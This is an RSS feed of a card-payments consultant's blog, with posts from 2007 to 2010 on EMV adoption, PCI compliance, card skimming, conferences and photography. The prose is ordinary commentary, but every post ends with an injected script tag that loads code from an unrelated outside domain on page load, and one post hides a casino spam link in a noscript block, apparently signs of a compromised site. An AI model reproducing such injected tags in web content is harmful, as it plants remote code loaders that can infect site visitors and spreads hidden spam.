<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>Card Technologies and Identity</title>
	<atom:link href="http://millenium3-ecommerce.com/?feed=rss2" rel="self" type="application/rss+xml" />
	<link>http://millenium3-ecommerce.com</link>
	<description>René Bastien's take on the card industry and life in general.  All material © 2009 by René Bastien</description>
	<lastBuildDate>Sat, 13 Feb 2010 12:47:44 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.4</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>Attacks againts EMV:  should we panick?</title>
		<link>http://millenium3-ecommerce.com/?p=62</link>
		<comments>http://millenium3-ecommerce.com/?p=62#comments</comments>
		<pubDate>Sat, 13 Feb 2010 12:47:44 +0000</pubDate>
		<dc:creator>admin</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=62</guid>
		<description><![CDATA[I have been consulting with Financial Institutions worldwide on the implementation of EMV for 10 years now.  My compliments to the team at the University of Cambridge Computer Laboratory for continuing to research potential weaknesses in the payment system.  This is how to make a system better:  peer review!
The proposed attack scenario [...]]]></description>
			<content:encoded><![CDATA[<p>I have been consulting with Financial Institutions worldwide on the implementation of EMV for 10 years now.  My compliments to the team at the University of Cambridge Computer Laboratory for continuing to research potential weaknesses in the payment system.  This is how to make a system better:  peer review!</p>
<p>The proposed attack scenario is actually not new; I wrote about it 9 years ago.  The attack seems to point to a weakness in the implementation choices made.  Fortunately, there are very simple counter measures that are available to protect cardholders and all participants in the payment ecosystem from this type of attack.   There are weaknesses in the system, but there are ways of protecting against them.  Send me an email at rbastien@millenium3-ecommerce.com for more information.</p>
<p>What really shocked me was the paper presented by Christopher Tarnovsky at Black Hat on February 2nd, 2010.  Once again, the attack scenario is not new.  I have known of electron microscope probing and defeating overlays for 19 years now.  The novelty of the attack seems to be in how to trick the CPU is disclosing information.  This warrants intensive peer review.</p>
<p>Bottom line:  all systems are vulnerable.  It is not viable to design systems that are foolproof.  Someone will always find a way in.  We need to focus on building a sturdy enough system so that criminals will go to a weaker target.  This is what we have with EMV.  The weaker target is the magnetic stripe and the USA&#8217;s reluctance to strengthen this token.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=62</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>EMV in the USA?</title>
		<link>http://millenium3-ecommerce.com/?p=55</link>
		<comments>http://millenium3-ecommerce.com/?p=55#comments</comments>
		<pubDate>Wed, 23 Sep 2009 20:26:06 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=55</guid>
		<description><![CDATA[I have been asked repeatedly over the years if the USA would eventually move to the EMV standard.   I wish I had a crystal ball when that happens, but I do not (it would be fun, as a consultant, to offer the crystal ball service to clients, at a premium of course  .   I [...]]]></description>
			<content:encoded><![CDATA[<p>I have been asked repeatedly over the years if the USA would eventually move to the EMV standard.   I wish I had a crystal ball when that happens, but I do not (it would be fun, as a consultant, to offer the crystal ball service to clients, at a premium of course <img src='http://millenium3-ecommerce.com/wp-includes/images/smilies/icon_wink.gif' alt=';-)' class='wp-smiley' /> .   I have said repeatedly that EMV is likely to happen in the USA, but not soon, probably not the way it has been done up to now, and probably through contactless.  And this is exactly what the Smart Card Alliance has concluded as well (see <a href="http://www.smartcardalliance.org/articles/2009/09/14/smart-card-alliance-says-end-to-end-encryption-is-not-enough-recommends-chip-and-dynamic-data-to-halt-card-fraud">http://www.smartcardalliance.org/articles/2009/09/14/smart-card-alliance-says-end-to-end-encryption-is-not-enough-recommends-chip-and-dynamic-data-to-halt-card-fraud</a> for the press release).</p>
<p><strong>Why would EMV be required in the USA?</strong></p>
<p>Fraud mitigation and risk reduction are the real answer.  Many payment executives in the USA believe that there is no real fraud issue currently because fraud, as a % of transaction value, is not increasing.   The problem is that, in absolute numbers, fraud is increasing.  That problem will be compounded in time with fraud migrating from EMV countries to the USA.  So American issuers and acquirers are likely to import much more fraud, my guess is within 3 to 5 years.</p>
<p>Risk reduction is another issue that is partly linked to fraud mitigation.  Credit card debt in the USA is US$10,000 per household.  Americans are quite adept at rolling debt into new accounts, keeping payments at a manageable level.  But this is a huge industry issue.  A lot of that debt is of sub-prime quality.  There is a huge default risk as we have seen in the last year.</p>
<p>The combined effect is likely to be a prudent risk management strategy that, hopefully, will lead to a required technology update.  The Smart Card Alliance&#8217;s position paper is a step in the right direction.<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=55</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PCI and Card Skimming</title>
		<link>http://millenium3-ecommerce.com/?p=57</link>
		<comments>http://millenium3-ecommerce.com/?p=57#comments</comments>
		<pubDate>Wed, 26 Aug 2009 14:29:30 +0000</pubDate>
		<dc:creator>Rene Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=57</guid>
		<description><![CDATA[Dark Reading has an interesting article on the release by the PCI Council of a best practices guide to assist merchants in the prevention of card skimming (see http://www.darkreading.com/security/government/showArticle.jhtml?articleID=219401468&#38;cid=nl_DR_DAILY_H).  I really like Chris Paget&#8217;s take on the weaknesses of the proposal by PCI, i.e. the proposal does not address malicious intent, and does not address [...]]]></description>
			<content:encoded><![CDATA[<p>Dark Reading has an interesting article on the release by the PCI Council of a best practices guide to assist merchants in the prevention of card skimming (see http://www.darkreading.com/security/government/showArticle.jhtml?articleID=219401468&amp;cid=nl_DR_DAILY_H).  I really like Chris Paget&#8217;s take on the weaknesses of the proposal by PCI, i.e. the proposal does not address malicious intent, and does not address risk during manufacturing of POS devices.</p>
<p>My 2 cents&#8217; worth on this important issue.  First, the EMV specifications partly address the risk factors during manufacturing and distribution of POS devices.  This is done through device and application certification.  The application code should normally be signed and the signature validated at boot-up.  This is not perfect though, as it leads to attack scenarios that can easily work around this control.  But it is a start!</p>
<p>More importantly, one of the key weaknesses of EMV (and I have been saying so for 10 years now) is that the card and terminal do not mutually authenticate at the beginning of a transaction.  This is a fundamental weakness.  It would have required secure key storage in POS terminals, something the authors of the original specs did not have the stomach to impose.</p>
<p>In the end, I fear this weakness will come back and haunt the industry.  As per Chris Paget&#8217;s suggestion, a Trusted Platform Module would help (see http://www.trustedcomputinggroup.org/) and there a lot of solid work has been done in this group and is readily usable in POS devices.</p>
<p>Bottom line:  we cannot go back to bartering!  We have to continue using plastic (physical or virtual) to pay for goods and services.  It is quick, convenient, economical for all parties involved.  But we need to keep the bad guys out or users will lose confidence in the system.</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=57</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>PCI does not mean good security!</title>
		<link>http://millenium3-ecommerce.com/?p=56</link>
		<comments>http://millenium3-ecommerce.com/?p=56#comments</comments>
		<pubDate>Fri, 10 Jul 2009 13:54:59 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=56</guid>
		<description><![CDATA[Fact:  Heartland had successfully passed the PCI audit requirements, yet was hacked.  And if it was the only case&#8230; but it was not.
Do not get me wrong.  The PCI standards are definitely a step in the right direction.  The industry, and by that I mean card issuers, transaction acquirers, merchants need to smarten up.  Card [...]]]></description>
			<content:encoded><![CDATA[<p>Fact:  Heartland had successfully passed the PCI audit requirements, yet was hacked.  And if it was the only case&#8230; but it was not.</p>
<p>Do not get me wrong.  The PCI standards are definitely a step in the right direction.  The industry, and by that I mean card issuers, transaction acquirers, merchants need to smarten up.  Card payment is a necessity in this day and age.  It is convenient for all parties involved in a payment transaction.  Do you think we could revert back to bartering (how many goats again for this flat screen TV?)?  How about walking around with  $2,000 cash in $20 bills to pay for this TV?  Or should we go back to cheques (who would assume the risk, what are the costs)?  The industry needs to embrace the necessity to protect cardholder data, otherwise cardholders will lose faith in the system.  Or worse, politicians will regulate the system.  Bruce Schneier has been saying for years that the best way of getting rid of poor security is to sue the culprits for software liability; see http://www.schneier.com/blog/archives/2007/08/house_of_lords_1.html for an example.  Why not extend this reasoning to the payment industry?</p>
<p>But PCI is only a part of the solution.  And Heartland is a prime example of this point.  All stakeholders in the payment system must take a holistic approach to the protection of sensitive data.  PCI compliance needs to be a part of the security posture of all stakeholders, not just going through an audit and having all of the check marks in the proper columns.  The security posture itself must be designed from the start to protect data.  Stakeholders are entrusted with information they do not, or should not, own.  Stakeholders, as part of their fiduciary obligations, should do the utmost to protect this information.</p>
<p>There are solutions out there that take a holistic approach to the protection of data.  Contact me if you need information; I will try and help as much as I can.</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=56</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Photography</title>
		<link>http://millenium3-ecommerce.com/?p=54</link>
		<comments>http://millenium3-ecommerce.com/?p=54#comments</comments>
		<pubDate>Mon, 06 Jul 2009 14:10:12 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[General Stuff]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=54</guid>
		<description><![CDATA[I have been taking pictures for a long time.  And I love it!  It is part hobby, part building lasting memories, and part sharing the beauty of this world with friends and colleagues.  The &#8216;My pictures&#8217; hyperlink on the right will take you to an external site where I post some of the pictures I [...]]]></description>
			<content:encoded><![CDATA[<p>I have been taking pictures for a long time.  And I love it!  It is part hobby, part building lasting memories, and part sharing the beauty of this world with friends and colleagues.  The &#8216;My pictures&#8217; hyperlink on the right will take you to an external site where I post some of the pictures I like.  Most of the pictures are unedited (I will crop some times, but I rarely do more).  Comments are welcome!</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=54</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Retailers and EMV &#8211; What you Need to Know</title>
		<link>http://millenium3-ecommerce.com/?p=49</link>
		<comments>http://millenium3-ecommerce.com/?p=49#comments</comments>
		<pubDate>Fri, 03 Jul 2009 16:53:33 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=49</guid>
		<description><![CDATA[CTST 2009 PresentationIt never ceases to amaze me that people in the payment industry seem to have a limited understanding of how a retail checkout works in the real world.  Payment is only a part of the global transaction, and payment is certainly not streamlined to be easily integrated into a checkout process.  I gave [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://millenium3-ecommerce.com/wp-content/uploads/2009/07/ctst2009.pdf" title="CTST 2009 Presentation">CTST 2009 Presentation</a>It never ceases to amaze me that people in the payment industry seem to have a limited understanding of how a retail checkout works in the real world.  Payment is only a part of the global transaction, and payment is certainly not streamlined to be easily integrated into a checkout process.  I gave a presentation at CTST 2009 on the business case for EMV, in the perspective of the issuer, the acquirer and the retailer.  Comments are more than welcome!!!</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=49</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>What Retailers Need to Know about EMV</title>
		<link>http://millenium3-ecommerce.com/?p=22</link>
		<comments>http://millenium3-ecommerce.com/?p=22#comments</comments>
		<pubDate>Tue, 26 Jun 2007 13:51:02 +0000</pubDate>
		<dc:creator>Rene Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=22</guid>
		<description><![CDATA[Here is a copy of the presentation I gave on June 25th at Cardware 2007 in Toronto (in the pages, right-hand side).  I had a great time preparing it and it was well received by the retailers present at the conference.
Do not hesitate to post commentsSo do not play at a online casino where [...]]]></description>
			<content:encoded><![CDATA[<p>Here is a copy of the presentation I gave on June 25th at Cardware 2007 in Toronto (in the pages, right-hand side).  I had a great time preparing it and it was well received by the retailers present at the conference.</p>
<p>Do not hesitate to post comments<noscript>So do not play at a <a href="http://www.snjpc.com">online casino</a> where you don&#8217;t feel good or you are bored. </noscript> if you have anything to add!</p>
<p>Best regards,</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=22</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cardware Ottawa 2007</title>
		<link>http://millenium3-ecommerce.com/?p=17</link>
		<comments>http://millenium3-ecommerce.com/?p=17#comments</comments>
		<pubDate>Fri, 22 Jun 2007 00:45:25 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=17</guid>
		<description><![CDATA[I am just back from Cardware Ottawa, the symposium held today by Act Canada.  This year&#8217;s event focused on Identity Management and Credentialing.  It was an interesting day all in all, with good speakers and interesting topics.
It was interesting to note that some of the discussions centered on a National  ID Cards. [...]]]></description>
			<content:encoded><![CDATA[<p>I am just back from Cardware Ottawa, the symposium held today by Act Canada.  This year&#8217;s event focused on Identity Management and Credentialing.  It was an interesting day all in all, with good speakers and interesting topics.</p>
<p>It was interesting to note that some of the discussions centered on a National  ID Cards.  I am adding the text of an article that was prepared for Card Technology in November 2003 on that topic.  It is interesting to see that the contents of the article is still of actuality, i.e. that the Members of Parliament that reviewed the proposal were quite perceptive.  The issues they raised still need to be addressed by the industry and by civil society.</p>
<p>The attendees heard a good presentation on the advantages of Global Platform to attain inter-operability and vendor independence, by Kevin Gillick.  Peter Macauley presented the challenges faced by the Government of Ontario&#8217;s pilot of credentials for physical and logical access control.  There was an interesting panel on the Western Hemisphere Travel Initiative by Catherine Johnston, Clive Addy and James Sheire.  Deborah Gallagher made a very clear presentation on the US Department of Defense&#8217;s Common Access card, and its extension to the rest of the US Government via PIV.</p>
<p>My main take-home point was that there seems to be a lot of interest  from various departments on the use of card technologies, but that there seems to be a vacuum as to how to organize such large-scale projects.</p>
<p>Interesting discussion also on a topic from the audience, i.e. how one could use FIPS 201 to facilitate common access for the 2010 Winter Olympics in Vancouver.  This is a great showcase and a great idea.  Maybe the Feds could negotiate with the Organizing Committee and do it in exchange for a sponsorship&#8230;  Just a thought.</p>
<p>Have a nice day, all!<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=17</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Cardware Toronto 2007</title>
		<link>http://millenium3-ecommerce.com/?p=16</link>
		<comments>http://millenium3-ecommerce.com/?p=16#comments</comments>
		<pubDate>Thu, 14 Jun 2007 23:07:59 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Uncategorized]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=16</guid>
		<description><![CDATA[I have the privilege of speaking at Cardware 2007, one of the symposiums organized by ACT Canada (more information at http://www.actcda.com/calendar/symposium.htm).  The purpose of my presentation is to illustrate what retailers need to know in preparation of the EMV migration.
You are all invited to attend as the program promises to be interesting.  I [...]]]></description>
			<content:encoded><![CDATA[<p>I have the privilege of speaking at Cardware 2007, one of the symposiums organized by ACT Canada (more information at <a href="http://www.actcda.com/calendar/symposium.htm" target="_blank">http://www.actcda.com/calendar/symposium.htm</a>).  The purpose of my presentation is to illustrate what retailers need to know in preparation of the EMV migration.</p>
<p>You are all invited to attend as the program promises to be interesting.  I will post my Powerpoint presentation as soon as the symposium is over.</p>
<p>See you all in Toronto on June 25th.</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=16</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>EMV Trial to begin in Canada</title>
		<link>http://millenium3-ecommerce.com/?p=15</link>
		<comments>http://millenium3-ecommerce.com/?p=15#comments</comments>
		<pubDate>Thu, 31 May 2007 19:26:33 +0000</pubDate>
		<dc:creator>Bastien</dc:creator>
				<category><![CDATA[Card Technologies]]></category>

		<guid isPermaLink="false">http://millenium3-ecommerce.com/?p=15</guid>
		<description><![CDATA[This is now out in the public domain.  A Canadian pilot will start in 2007, peaking in March 2008.  See the article on Card Technology, at http://www.cardtechnology.com/article.html?id=20070529PCKY4NLS.
It will be interesting to see how the technology is accepted by cardholders and merchants, and if there are any technology issues.  More to follow as [...]]]></description>
			<content:encoded><![CDATA[<p>This is now out in the public domain.  A Canadian pilot will start in 2007, peaking in March 2008.  See the article on Card Technology, at http://www.cardtechnology.com/article.html?id=20070529PCKY4NLS.</p>
<p>It will be interesting to see how the technology is accepted by cardholders and merchants, and if there are any technology issues.  More to follow as soon as information becomes public!</p>
<p>René<script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://millenium3-ecommerce.com/?feed=rss2&amp;p=15</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
   

